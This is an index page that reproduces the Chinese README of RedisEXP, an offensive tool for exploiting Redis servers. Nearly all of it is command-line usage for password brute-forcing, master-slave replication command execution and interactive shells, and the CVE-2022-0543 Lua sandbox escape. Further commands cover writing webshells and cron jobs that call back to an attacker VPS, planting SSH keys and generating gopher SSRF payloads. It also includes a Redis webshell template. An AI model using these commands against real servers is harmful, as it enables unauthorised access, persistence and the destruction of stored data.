Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/yuyan-sec/RedisEXP

Redis 漏洞利用工具
https://github.com/yuyan-sec/RedisEXP

Last synced: 3 months ago
JSON representation

Redis 漏洞利用工具

Awesome Lists containing this project

README 

        
## Redis 漏洞利用工具



### 声明



**本工具仅用于个人安全研究学习。由于传播、利用本工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,工具作者不为此承担任何责任。**



------



### 注意



**主从复制会清空数据,主从复制会清空数据,主从复制会清空数据,请注意使用!请注意使用!请注意使用!**



------



```



██████╗ ███████╗██████╗ ██╗███████╗    ███████╗██╗  ██╗██████╗

██╔══██╗██╔════╝██╔══██╗██║██╔════╝    ██╔════╝╚██╗██╔╝██╔══██╗

██████╔╝█████╗  ██║  ██║██║███████╗    █████╗   ╚███╔╝ ██████╔╝

██╔══██╗██╔══╝  ██║  ██║██║╚════██║    ██╔══╝   ██╔██╗ ██╔═══╝

██║  ██║███████╗██████╔╝██║███████║    ███████╗██╔╝ ██╗██║

╚═╝  ╚═╝╚══════╝╚═════╝ ╚═╝╚══════╝    ╚══════╝╚═╝  ╚═╝╚═╝



基本连接: 

RedisExp.exe -r 192.168.19.1 -p 6379 -w 123456



爆破 Redis 密码:

RedisExp.exe brute -r 目标IP -p 目标端口 -f 字典文件

RedisExp.exe brute -r 192.168.19.1 -f pass.txt



主从复制执行命令 (默认是交互式 shell)(Redis版本 4.x - 5.x):

RedisExp.exe -r 目标IP -p 目标端口 -w 密码 -L 本地IP -P 本地Port [-c whoami 单次执行]

RedisExp.exe rce -r 192.168.19.1 -L 127.0.0.1 -c whoami (单次执行)

RedisExp.exe rce -r 192.168.19.1 -L 127.0.0.1

RedisExp.exe rce -r 192.168.19.1 -L 127.0.0.1 -f exp.so (Linux)



主从复制文件上传 (windows 中文需要设置gbk)(Redis版本 4.x - 5.x):

RedisExp.exe -r 目标IP -p 目标端口 -w 密码 -L 本地IP -P 本地Port -d 目标路径 -f 目标文件名 -F 本地文件

RedisExp.exe upload -r 192.168.19.1 -L 127.0.0.1 -d c:\\中文\\ -f shell.php -F shell.txt -g

RedisExp.exe upload -r 192.168.19.1 -L 127.0.0.1 -f shell.php -F shell.txt



关闭主从复制

RedisExp.exe close -r 192.168.19.1



Lua沙盒绕过命令执行 CVE-2022-0543:

RedisExp.exe lua -r 192.168.19.6 -c whoami



备份写 Webshell: 

1. Windows 中文路径要设置gbk, linux 中文路径不用设置。

2. webshell的内容是base64,使用 -b 参数来解码。工具默认会关闭Redis压缩进行写入,写入后再恢复。



RedisExp.exe shell -r 目标IP -p 目标端口 -w 密码 -d 目标路径 -f 目标文件名 -s Webshell内容

RedisExp.exe shell -r 192.168.19.1 -d c:\\中文\\ -f shell.php -s "" -g

RedisExp.exe shell -r 192.168.19.1 -d c:\\中文\\ -f shell.php -s "PD9waHAgcGhwaW5mbygpOz8+" -g -b



Linux 写计划任务:

RedisExp.exe cron -r 目标IP -p 目标端口 -w 密码 -L VpsIP -P VpsPort

RedisExp.exe cron -r 192.168.19.1 -L 127.0.0.1 -P 2222



Linux 写 SSH 公钥:

RedisExp.exe ssh -r 目标IP -p 目标端口 -w 密码 -n 用户名 -s 公钥

RedisExp.exe ssh -r 192.168.19.1 -u root -s "ssh-rsa AAAAB"



执行 Redis 命令:

RedisExp.exe cli -r 192.168.19.1



生成 gopher ssrf redis payload: 

RedisExp.exe gopher -f 1.txt



```



gopher 写webshell模板

```

flushall

config set dir /tmp

config set dbfilename shell.php

set 'webshell' ''

save

```



关闭Redis压缩(写入乱码的时候可以关闭压缩,工具在写入shell的时候默认添加了关闭压缩,写入后再恢复开启压缩)

```

config set rdbcompression no

```



1. 具体命令使用 -h 来查看

2. exp.dll 和 exp.so 来自 https://github.com/0671/RabR 已经把内容分别加载到 dll.go 和 so.go 可以直接调用。

3. Windows 中文路径需要设置gbk,使用 -g 参数就可以了。

4. 在写入webshell的时候因为有一些特殊字符,可以使用把webshell进行 base64 编码,然后使用 -b 参数来解码



### 报错



```

工具报错:[ERR Error loading the extension. Please check the server logs.]        module load /tmp/exp.so



服务端报错:Module /tmp/exp.so failed to load: It does not have execute permissions.

```



有可能是 Redis 版本太高, exp.so 没有执行权限导致加载不了。具体需要查看服务端的报错



### 参考



本工具基于大量优秀文章和工具才得以~~编写~~ 抄写完成,非常感谢这些无私的分享者!



- https://github.com/zyylhn/redis_rce

- https://github.com/0671/RabR

- https://github.com/r35tart/RedisWriteFile

- https://github.com/toalaska/redis_tool

- https://yanghaoi.github.io/2021/10/09/redis-lou-dong-li-yong/

- https://github.com/firebroo/sec_tools/tree/master/redis-over-gopher

- [原创 Paper | Windows 与 Java 环境下的 Redis 利用分析](https://mp.weixin.qq.com/s/f7hPOoSSiRJpyMK51_Vxrw)